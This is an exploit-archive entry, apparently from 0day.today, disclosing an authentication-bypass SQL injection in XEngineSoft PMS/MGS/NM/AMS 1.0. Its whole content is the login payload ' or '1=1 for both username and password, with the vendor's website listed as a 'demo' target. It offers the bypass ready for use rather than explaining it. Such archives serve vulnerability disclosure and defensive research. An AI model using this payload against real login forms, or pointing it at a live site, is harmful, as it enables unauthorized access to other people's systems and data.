id: 5025
date: 04/12/2009
title: XEngineSoft PMS/MGS/NM/AMS 1.0 (Auth Bypass) SQL Injection Vulns
author: Dr-HTmL
cves: 

================================================================
XEngineSoft PMS/MGS/NM/AMS 1.0 (Auth Bypass) SQL Injection Vulns
================================================================


-----------------------------------------------------------
DD)
---
Username: ' or '1=1
Password: ' or '1=1
-----------------------------------------------
demo:
----
http://www.xenginesoft.com/
------------------------------------------------------



#  0day.today [2023-03-22]  #